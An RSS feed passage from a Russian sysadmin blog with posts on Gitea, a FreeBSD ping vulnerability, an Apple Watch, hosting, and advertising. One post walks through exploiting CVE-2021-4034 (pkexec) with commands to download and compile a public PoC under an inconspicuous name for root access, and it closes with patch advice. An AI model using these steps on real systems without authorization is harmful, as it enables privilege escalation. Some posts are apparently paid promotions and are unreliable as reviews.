<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/tableu.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7444" src="https://litl-admin.ru/wp-content/uploads/2022/12/tableu-620x298.jpg" alt="" width="620" height="298" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/tableu-620x298.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/12/tableu-940x452.jpg 940w, https://litl-admin.ru/wp-content/uploads/2022/12/tableu-768x369.jpg 768w, https://litl-admin.ru/wp-content/uploads/2022/12/tableu.jpg 1057w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="298"></span></a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/bezopasnost/kak-podklyuchit-fleshku-v-rezhime-tolko-chtenie.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Gitea для управления проектами и совместной разработки</title>
		<link>https://litl-admin.ru/obzory/gitea-dlya-upravleniya-proektami-i-sovmestnoj-razrabotki.html</link>
					<comments>https://litl-admin.ru/obzory/gitea-dlya-upravleniya-proektami-i-sovmestnoj-razrabotki.html#respond</comments>
		
		
		<pubDate>Fri, 02 Dec 2022 05:00:16 +0000</pubDate>
				<category><![CDATA[Обзоры]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7431</guid>

					<description><![CDATA[В порядке обмена опытом, как-то полюбопытствовал у своих товарищей, что используют для управления проектами у себя в регионах. Необходимый функционал, который требовался: Интеграция с git. Простота развёртывания и работы. Opensource желательно, либо недорого. Приятный графический интерфейс. Многопользовательская, возможность нарезать задачи, вести переписку, писать документацию, делегировать, проверять. Возможность одновременно вести несколько проектов. Функции не так, чтобы [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>В порядке обмена опытом, как-то полюбопытствовал у своих товарищей, что используют для управления проектами у себя в регионах. Необходимый функционал, который требовался:</p>
<ul>
<li>Интеграция с git.</li>
<li>Простота развёртывания и работы.</li>
<li>Opensource желательно, либо недорого.</li>
<li>Приятный графический интерфейс.</li>
<li>Многопользовательская, возможность нарезать задачи, вести переписку, писать документацию, делегировать, проверять.</li>
<li>Возможность одновременно вести несколько проектов.</li>
</ul>
<p>Функции не так, чтобы сильно &#8220;бородатые&#8221;, можно было заморочиться и написать самому, но вдруг что-то готовое уже есть? И посоветовали мне посмотреть на Gitea. (демка <a href="https://try.gitea.io/" target="_blank" rel="nofollow noopener">тут</a>)</p>
<h2>То, что нужно!</h2>
<p>Первая мысль была</p>
<blockquote class="quote"><p><em>&#8220;Да моб твою ять!! как же я раньше без этого жил?&#8221;</em></p></blockquote>
<p>И слёзы счастья, что мудохался несколько лет с несколькими программами параллельно в несколько окон. Разработка в одном месте, консольный git в другом окне, планировщик &#8211; отдельно. И рабочий чат. И для документации &#8211; отдельное окно Markdown редактора.</p>
<h2>Установка и настройка</h2>
<ol>
<li>Качаем под свою платформу: <a href="https://dl.gitea.io/gitea" target="_blank" rel="nofollow noopener">https://dl.gitea.io/gitea</a> (1.17.3 текущий релиз, не рекомендую брать development branch &#8211; жутко глючит и крашится).</li>
<li>У меня уже развёрнут MySQL под другие проекты, так что просто создаю БД под gitea.</li>
<li>Запускаем инсталлятор и переходим на страницу установки: <a href="http://localhost:3000" target="_blank" rel="nofollow noopener">http://localhost:3000</a></li>
<li>Следуем простым инструкция и всё готово за считанные минуты.</li>
</ol>
<p>Дальше всё зависит от вашей работы. Я создал репозиторий, проекты, завёл пользователя. Создал свои метки и этапы проекта.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7432" src="https://litl-admin.ru/wp-content/uploads/2022/12/1-620x395.png" alt="" width="620" height="395" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/1-620x395.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/1-940x599.png 940w, https://litl-admin.ru/wp-content/uploads/2022/12/1-768x489.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/1.png 1488w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="395"></span></a>Выглядит как вполне приличный Github.</p>
<p>Отслеживание активности пользователей:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/12/2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7433" src="https://litl-admin.ru/wp-content/uploads/2022/12/2-620x474.png" alt="" width="620" height="474" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/2-620x474.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/2-940x718.png 940w, https://litl-admin.ru/wp-content/uploads/2022/12/2-768x587.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/2.png 1185w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="474"></span></a></p>
<p>Страница Wiki (не люблю писать документацию, но надо. В общем всё тоже тут есть, достаточно неплохой визуальный редактор).<a href="https://litl-admin.ru/wp-content/uploads/2022/12/3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7434" src="https://litl-admin.ru/wp-content/uploads/2022/12/3-620x442.png" alt="" width="620" height="442" srcset="https://litl-admin.ru/wp-content/uploads/2022/12/3-620x442.png 620w, https://litl-admin.ru/wp-content/uploads/2022/12/3-940x670.png 940w, https://litl-admin.ru/wp-content/uploads/2022/12/3-768x547.png 768w, https://litl-admin.ru/wp-content/uploads/2022/12/3.png 1168w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="442"></span></a>Кароче, на текущий момент эта тема закрывает 100% необходимых задач и я очень доволен. Кроме того, на любой коммит можно выпустить релиз, который автоматически упакует исходники в популярные типы архивов, покажет необходимые пояснения и вообще выглядит вполне достойно.</p>
<p>Пока продолжаю пользоваться, может кому-то тоже будет интересно посмотреть!</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/obzory/gitea-dlya-upravleniya-proektami-i-sovmestnoj-razrabotki.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Откуда не ждали. RCE в утилите ping в FreeBSD</title>
		<link>https://litl-admin.ru/freebsd/otkuda-ne-zhdali-rce-v-utilite-ping-v-freebsd.html</link>
					<comments>https://litl-admin.ru/freebsd/otkuda-ne-zhdali-rce-v-utilite-ping-v-freebsd.html#respond</comments>
		
		
		<pubDate>Fri, 02 Dec 2022 00:39:37 +0000</pubDate>
				<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[Юмор]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7427</guid>

					<description><![CDATA[01.12.2022 появилась новость о выявлении уязвимости в FreeBSD (утилита ping из базовой поставки) CVE-2022-23093. Уязвимость состоит в возможности переполнения буфера дополнительными заголовками ответа ping и, как следствие, вероятность выполнить произвольный код у себя в системе с правами root просто пропинговав &#8220;заряженный&#8221; злоумышленниками хост. Возможность дальнейшей реализации может быть затруднительна, но тем не менее, публикация таких [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>01.12.2022 появилась новость о выявлении уязвимости в FreeBSD (утилита ping из базовой поставки) <a href="https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc" target="_blank" rel="nofollow noopener">CVE-2022-23093</a>.</p>
<p>Уязвимость состоит в возможности переполнения буфера дополнительными заголовками ответа ping и, как следствие, вероятность выполнить произвольный код у себя в системе с правами root просто пропинговав &#8220;заряженный&#8221; злоумышленниками хост.</p>
<p>Возможность дальнейшей реализации может быть затруднительна, но тем не менее, публикация таких новостей помогает подсветить очень важные моменты.</p>
<ol>
<li><strong>Думаете, ваша среда/система безопасна?</strong> Просто пока не нашли (не обнародовали уязвимость).</li>
<li><strong>Уже давно бы всё нашли?</strong> Да просто не искали особо (не думали, что это важно).</li>
<li><strong>Старые инструменты &#8211; проверенные временем.</strong> Ну раньше писали не учитывая тот опыт, который есть сейчас &#8211; новые вектора атак, особенности взаимодействия с современными инструментами.</li>
<li><strong>Защищаемся только от внешних атак. Внутри всё хорошо.</strong> И как показала данная уязвимость, проблемы могут возникнуть даже при казалось бы безобидных действиях.</li>
</ol>
<p>Патч на ping доступен, можно перекомпилировать.</p>
<p>Ну и конечно, интереснее всего PoC, как я понимаю, это будет какая-то модификация пакетов на уровне сервера.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/freebsd/otkuda-ne-zhdali-rce-v-utilite-ping-v-freebsd.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Apple Watch Ultra: чем интересны эти часы</title>
		<link>https://litl-admin.ru/dlya-kolleg/apple-watch-ultra-chem-interesny-eti-chasy.html</link>
					<comments>https://litl-admin.ru/dlya-kolleg/apple-watch-ultra-chem-interesny-eti-chasy.html#respond</comments>
		
		
		<pubDate>Thu, 10 Nov 2022 11:22:04 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7422</guid>

					<description><![CDATA[Apple Watch Ultra – топовая модель производителя, которая позиционируется как ультраэкстремальная. От обычных часов Apple Watch и бюджетных SE эта модель отличается техническими показателями, дизайном и несколькими функциями. Ознакомиться с моделями можно по ссылке https://myapple61.ru/apple-watch/apple-watch-ultra/. Устойчивые к нагрузкам и воде Часы весят чуть больше 60 г. Корпус широкий, массивный. Материал изготовления – титан, поэтому они выглядят внушительно, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Apple Watch Ultra – топовая модель производителя, которая позиционируется как ультраэкстремальная. От обычных часов Apple Watch и бюджетных SE эта модель отличается техническими показателями, дизайном и несколькими функциями. Ознакомиться с моделями можно по ссылке <a href="https://myapple61.ru/apple-watch/apple-watch-ultra/">https://myapple61.ru/apple-watch/apple-watch-ultra/</a>.</p>
<h2>Устойчивые к нагрузкам и воде</h2>
<p>Часы весят чуть больше 60 г. Корпус широкий, массивный. Материал изготовления – титан, поэтому они выглядят внушительно, но почти не ощущаются на руке. Циферблат изготовлен из сапфирового стекла. В официальном ролике-презентации производитель показывал восхождение альпиниста, у него эти часы бились и царапались о камни, но остались без повреждений. Ремешки выпускаются в трёх дизайнах: два текстильные – для гор и регулируемый для бега, один силиконовый для плавания.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/11/1_52.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7423" src="https://litl-admin.ru/wp-content/uploads/2022/11/1_52.jpg" alt="" width="400" height="400" srcset="https://litl-admin.ru/wp-content/uploads/2022/11/1_52.jpg 400w, https://litl-admin.ru/wp-content/uploads/2022/11/1_52-300x300.jpg 300w, https://litl-admin.ru/wp-content/uploads/2022/11/1_52-80x80.jpg 80w, https://litl-admin.ru/wp-content/uploads/2022/11/1_52-120x120.jpg 120w" sizes="(max-width: 400px) 100vw, 400px" /><meta itemprop="width" content="400"><meta itemprop="height" content="400"></span></a></p>
<p>Часы выдерживают большой диапазон температур: от -20 до +55 градусов. Надёжность <a href="https://myapple61.ru/apple-watch/apple-watch-ultra/">apple-watch-ultra</a> подтверждается полученным сертификатом MIL-STD-810H военного класса. Такой документ выдаётся только после прохождения полевых испытаний. Проверяется устойчивость оборудования к перепадам температуры и давления, осадкам, повышенной влажности, песку и пыли, перегрузкам во время ускорения, вибрации.</p>
<p>С Apple Watch Ultra можно погружаться под воду на глубину до 40 метров. Это предельный показатель для спортивного и рекреационного дайвинга. В режиме погружения на дисплее отображается компас и температура воды.</p>
<h2>Новый дисплей и звук</h2>
<p>Дисплей в часах имеет диагональ 1,92 дюйма. Циферблат Wayfinder оснащён восемью виджетами. Доступен ночной режим: достаточно повернуть кнопку Digital Crown, и включится ночной режим: красный шрифт на черном дисплее. В OLED-матрице пиксели не подсвечиваются, за счет этого часы удобно использовать в темноте. Днём яркости дисплея тоже хватает, чтобы беспрепятственно видеть всё, что нужно, тоже благодаря встроенной OLED-матрице.</p>
<p>Качественнее стал звук. Часы оснащены тремя микрофонами, функцией шумоподавления и двойным динамиком. Время работы на одном заряде выросло с 18 до 36 часов по сравнению с обычными моделями. Аккумулятор увеличен до 542 мАч, так что в режиме экономии часы могут работать до 4-5 дней.</p>
<h2>Возможности смартфона</h2>
<p>Apple Watch Ultra – это почти iPhone. С ними можно тренироваться, ездить на велосипеде и мониторить сон, пользоваться приложениями и голосовым ассистентом, наслаждаться красивым интерфейсом. Часы считают шаги, следят за уровнем кислорода в крови, температурой и сердечным ритмом, делают ЭКГ, умеют отслеживать падения и ДТП.</p>
<p>С часами всегда и практически везде вам будет доступна сотовая связь и доступ к сбережениям – переводить деньги и оплачивать покупки стало проще. Вы можете оставаться на связи до 18 часов в течение всего дня даже без подзарядки батареи. У вас будет доступ к любимой музыке, подкастам и аудиокнигам в потоковом режиме. Можно прокладывать маршруты и отмечать точки, где вы были, на карте, смотреть погоду. Достаточно подключить все часы в семье к одному iPhone, и полный набор функций будет доступен каждому из вас.</p>
<p>Серия Apple Watch Ultra создана для людей, привыкших жить активно, но не готовых отказаться от комфорта. Производитель часов доказал: необязательно отказываться от удобств, даже отправляясь в горы или ныряя с аквалангом.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/dlya-kolleg/apple-watch-ultra-chem-interesny-eti-chasy.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Популярная уязвимость множества версий Linux – CVE-2021-4034</title>
		<link>https://litl-admin.ru/xaking/populyarnaya-uyazvimost-mnozhestva-versij-linux-cve-2021-4034.html</link>
					<comments>https://litl-admin.ru/xaking/populyarnaya-uyazvimost-mnozhestva-versij-linux-cve-2021-4034.html#respond</comments>
		
		
		<pubDate>Mon, 31 Oct 2022 12:15:54 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Безопасность]]></category>
		<category><![CDATA[Хакинг]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7415</guid>

					<description><![CDATA[Периодически проверяя свою систему свеженьким linPEAS натыкался на упоминание об одной уязвимости с кодом CVE-2021-4034, позволяющей организовать выполнение кода в контексте рута при помощи /usr/bin/pkexec, имеющего suid бит =) Классика. И вот решил покзаать, среди прочего, как можно быстро использовать эту возможность. Чисто в ознакомительных целях, разумеется. Итак, имеем CentOS 7.9 &#8220;из коробки&#8221;. Единственное требование [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Периодически проверяя свою систему свеженьким linPEAS натыкался на упоминание об одной уязвимости с кодом CVE-2021-4034, позволяющей организовать выполнение кода в контексте рута при помощи /usr/bin/pkexec, имеющего suid бит =) Классика.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/1-1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7416" src="https://litl-admin.ru/wp-content/uploads/2022/10/1-1-620x404.png" alt="" width="620" height="404" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/1-1-620x404.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/1-1.png 699w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="404"></span></a>И вот решил покзаать, среди прочего, как можно быстро использовать эту возможность. Чисто в ознакомительных целях, разумеется.</p>
<p>Итак, имеем CentOS 7.9 &#8220;из коробки&#8221;. Единственное требование &#8211; установленный компилятор &#8220;gcc&#8221;, но если админ собирал какие-то модули прямо на серваке, то 99% там уже будет установлено всё, что вам нужно.</p>
<p>Исходный код эксплойта уже есть много где, достаточно погуглить CVE-шку и ключевое слово &#8220;PoC&#8221; (Proof of Concept). Я же нашёл вот ссыль: <a href="https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c" target="_blank" rel="nofollow noopener">https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c</a></p>
<p>Качаем любимым способом:</p>
<p>$ wget https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/2-1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7417" src="https://litl-admin.ru/wp-content/uploads/2022/10/2-1-620x404.png" alt="" width="620" height="404" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/2-1-620x404.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/2-1.png 699w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="404"></span></a>Компилируем исходник во что-нибудь с непримечательным именем. Я компильну так:</p>
<p>$ gcc cve-2021-4034-poc.c -o litladmin_exploit</p>
<p>и файл появится в текущем каталоге с исполняемым флагом. Кстати, в отсутствии компилятора всегда можно собрать файл на другом серваке и просто закачать его туда.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/3-1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7418" src="https://litl-admin.ru/wp-content/uploads/2022/10/3-1-620x404.png" alt="" width="620" height="404" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/3-1-620x404.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/3-1.png 699w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="404"></span></a>После запуска файла увидим изменение контекста и &#8230; у нас права рута. Та-дамс!</p>
<p>Кстати, можем не получать интерактивный шелл, а просто выполнить некоторые команды от имени рута. Достаточно немного поменять шелл-код в исходнике:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/4.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7419" src="https://litl-admin.ru/wp-content/uploads/2022/10/4-620x253.png" alt="" width="620" height="253" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/4-620x253.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/4-940x384.png 940w, https://litl-admin.ru/wp-content/uploads/2022/10/4-768x314.png 768w, https://litl-admin.ru/wp-content/uploads/2022/10/4.png 1224w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="253"></span></a></p>
<h2>Как защититься?</h2>
<p>Обновляем систему в общем (yum update -y) и polkit в частности (yum install -y polkit).</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/5.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7420" src="https://litl-admin.ru/wp-content/uploads/2022/10/5.png" alt="" width="605" height="182" /><meta itemprop="width" content="605"><meta itemprop="height" content="182"></span></a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/xaking/populyarnaya-uyazvimost-mnozhestva-versij-linux-cve-2021-4034.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Обзор хостинга steadyhost</title>
		<link>https://litl-admin.ru/web-server/obzor-xostinga-steadyhost.html</link>
					<comments>https://litl-admin.ru/web-server/obzor-xostinga-steadyhost.html#respond</comments>
		
		
		<pubDate>Mon, 24 Oct 2022 09:54:05 +0000</pubDate>
				<category><![CDATA[WEB-server]]></category>
		<category><![CDATA[Для коллег]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7412</guid>

					<description><![CDATA[Steadyhost — это хостинговая компания, которая работает с 2004 года. Они предлагают различные услуги, включая виртуальный хостинг, реселлерский хостинг, vps-хостинг и выделенные серверы. Они также предлагают широкий спектр возможностей, таких как неограниченная пропускная способность, учетные записи электронной почты и базы данных mysql. Полный обзор функций хостинга Steadyhost на сайте www.hostRadar.ru позволит получить всю необходимую информацию и принять [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Steadyhost — это хостинговая компания, которая работает с 2004 года. Они предлагают различные услуги, включая виртуальный хостинг, реселлерский хостинг, vps-хостинг и выделенные серверы. Они также предлагают широкий спектр возможностей, таких как неограниченная пропускная способность, учетные записи электронной почты и базы данных mysql. Полный обзор функций хостинга Steadyhost на сайте <a href="https://hostradar.ru/">www.hostRadar.ru</a> позволит получить всю необходимую информацию и принять взвешенное решение о выборе Steadyhost для размещения своего интернет-проекта.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-24_20-52-14.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7413" src="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-24_20-52-14-620x496.png" alt="" width="620" height="496" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-24_20-52-14-620x496.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-24_20-52-14-940x752.png 940w, https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-24_20-52-14-768x614.png 768w, https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-24_20-52-14.png 978w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="496"></span></a></p>
<p>Steadyhost предлагает различные услуги, включая виртуальный хостинг, реселлерский хостинг, vps-хостинг и выделенные серверы. Они также предлагают широкий спектр возможностей, таких как неограниченная пропускная способность, учетные записи электронной почты и базы данных mysql.</p>
<p>Есть много причин выбрать steadyhost в качестве хостинговой компании. Они работают уже более 10 лет и имеют репутацию надежной компании с отличным обслуживанием клиентов. Они предлагают широкий спектр услуг и функций, а их цены очень конкурентоспособны.</p>
<p>Steadyhost предлагает различные тарифные планы, которые удовлетворят ваши потребности. Их планы виртуального хостинга начинаются от $4,95 в месяц за базовый план, который включает 1 гб дискового пространства и 10 гб пропускной способности. Планы для реселлеров начинаются от $19,95 в месяц за базовый план, включающий 20 Гб дискового пространства и 200 Гб пропускной способности. Планы vps начинаются от $29,95 в месяц за базовый план, который включает 30 гб дискового пространства и 500 гб пропускной способности. А тарифные планы выделенных серверов начинаются от $99 в месяц за базовый план, включающий 100 гб дискового пространства и 1000 гб пропускной способности.</p>
<p>Если вы находитесь в поисках новой хостинг-компании, возможно, вам интересно узнать о компании steadyhost. В этой статье мы рассмотрим некоторые отзывы о steadyhost, чтобы узнать, что говорят клиенты о своем опыте.</p>
<p>В целом, отзывы о компании steadyhost положительные. Клиенты высоко оценивают гарантию бесперебойной работы компании и дружелюбное обслуживание клиентов. Многие клиенты также говорят, что они довольны соотношением цены и качества.</p>
<p>Есть несколько негативных отзывов, но они, похоже, в меньшинстве. Некоторые клиенты жаловались на проблемы с выставлением счетов и настройкой аккаунта. Тем не менее, стоит отметить, что большинство из этих отзывов все же говорят, что рекомендовали бы steadyhost другим.</p>
<p>В целом, похоже, что steadyhost — хороший вариант, если вы ищете новую хостинг-компанию. Обязательно прочитайте несколько отзывов, прежде чем принять окончательное решение, но, похоже, что steadyhost — хороший выбор для многих людей.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/web-server/obzor-xostinga-steadyhost.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Реклама через блогеров: стоит ли использовать маркетинговый инструмент</title>
		<link>https://litl-admin.ru/seo/reklama-cherez-blogerov-stoit-li-ispolzovat-marketingovyj-instrument.html</link>
					<comments>https://litl-admin.ru/seo/reklama-cherez-blogerov-stoit-li-ispolzovat-marketingovyj-instrument.html#respond</comments>
		
		
		<pubDate>Mon, 24 Oct 2022 09:27:30 +0000</pubDate>
				<category><![CDATA[SEO]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7410</guid>

					<description><![CDATA[От эффективности рекламной кампании напрямую зависят показатели продаж. Для получения хороших результатов задействуются разные маркетинговые инструменты. Одним из самых эффективных в современном обществе считается реклама в социальных сетях у блогеров. Главное — подобрать подходящий аккаунт, где будет собрана приблизительно ваша аудитория потенциальных клиентов. Если не хотите заниматься этим вопросом самостоятельно, обратитесь в блогерское агентство. Специалисты [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>От эффективности рекламной кампании напрямую зависят показатели продаж. Для получения хороших результатов задействуются разные маркетинговые инструменты. Одним из самых эффективных в современном обществе считается реклама в социальных сетях у блогеров. Главное — подобрать подходящий аккаунт, где будет собрана приблизительно ваша аудитория потенциальных клиентов.</p>
<p>Если не хотите заниматься этим вопросом самостоятельно, обратитесь в <a href="https://bloger.aventon.ru/">блогерское агентство</a>. Специалисты подберут аккаунты, которые подойдут по решению проблем именно ваших маркетинговых целей.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/dnative-reklama.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7411" src="https://litl-admin.ru/wp-content/uploads/2022/10/dnative-reklama-620x413.jpg" alt="" width="620" height="413" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/dnative-reklama-620x413.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/10/dnative-reklama-768x512.jpg 768w, https://litl-admin.ru/wp-content/uploads/2022/10/dnative-reklama.jpg 900w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="413"></span></a></p>
<h2>Насколько выгодно заказывать рекламу у блогеров</h2>
<p>Реклама у блогеров может быть разной. Среди основных типов:</p>
<ul>
<li>пост в ленте;</li>
<li>пост рекламный;</li>
<li>пост в рекомендациях;</li>
<li>сторис;</li>
<li>клип.</li>
</ul>
<p>От выбранного способа рекламы, а также самого аккаунта зависит цена на услугу. Ее уточнять лучше в индивидуальном формате. Вне зависимости от стоимости можно быть уверенным в положительном результате. Реклама у блогеров имеет сразу несколько сильных сторон:</p>
<ol>
<li>Не заставит себя ждать. Аудитория блогера (если он хорошо раскручен) практически сразу реагирует на рекламу. Поэтому заявки, заказы вам начнут поступать сразу же после публикации рекламного материала.</li>
<li>Дает возможность воздействовать на целевую аудиторию. Главное — подобрать аккаунт с нужной тематикой. Например, если вы продаете резиновые ленты для силовых тренировок, следует выбрать спортивного блогера.</li>
<li>Остается доступной по цене. Ее позволить себе могут как владельцы крупного, так и среднего, малого бизнеса. И что самое главное — она очень быстро окупается.</li>
</ol>
<p>С помощью рекламы у блогеров можно получить прямые переходы на свой сайт, страницу товара в интернет-магазине или аккаунт в социальной сети. Если вы заказываете клип, сторис или пост, обязательно продумайте, каким образом будет подаваться информация. Она должна вовлекать аудиторию, побуждать ее к определенным действиям. В таком случае реклама будет действительно эффективной.</p>
<p>Все товары и услуги нуждаются в продвижении. Именно благодаря этому вы сможете повысить свои продажи. Оптимальное решение для рекламы — обратиться к блогерам. Они имеют целевую аудиторию, которая доверяет. Поможет вам подобрать подходящий аккаунт <a href="https://bloger.aventon.ru/">агентство по работе с блогерами</a>. Подробности по поводу порядка сотрудничества уточняйте индивидуально во время консультации.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/seo/reklama-cherez-blogerov-stoit-li-ispolzovat-marketingovyj-instrument.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Сайт на WordPress: особенности оформления и пополнения контентом</title>
		<link>https://litl-admin.ru/sajt/sajt-na-wordpress-osobennosti-oformleniya-i-popolneniya-kontentom.html</link>
					<comments>https://litl-admin.ru/sajt/sajt-na-wordpress-osobennosti-oformleniya-i-popolneniya-kontentom.html#respond</comments>
		
		
		<pubDate>Mon, 24 Oct 2022 09:14:38 +0000</pubDate>
				<category><![CDATA[Сайт]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7408</guid>

					<description><![CDATA[WordPress — популярная платформа для создания сайтов. Она представляет собой систему управления контентом с продвинутым функционалом. Ей активно пользуются даже профессиональные разработчики. С помощью платформы создаются корпоративные сайты, лендинги, портфолио, интернет-магазины и форумы. Научиться работать с системой поможет учебник по WordPress. С его помощью вы узнаете, какие возможности дает платформа для создания классных сайтов совершенно бесплатно. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>WordPress — популярная платформа для создания сайтов. Она представляет собой систему управления контентом с продвинутым функционалом. Ей активно пользуются даже профессиональные разработчики. С помощью платформы создаются корпоративные сайты, лендинги, портфолио, интернет-магазины и форумы.</p>
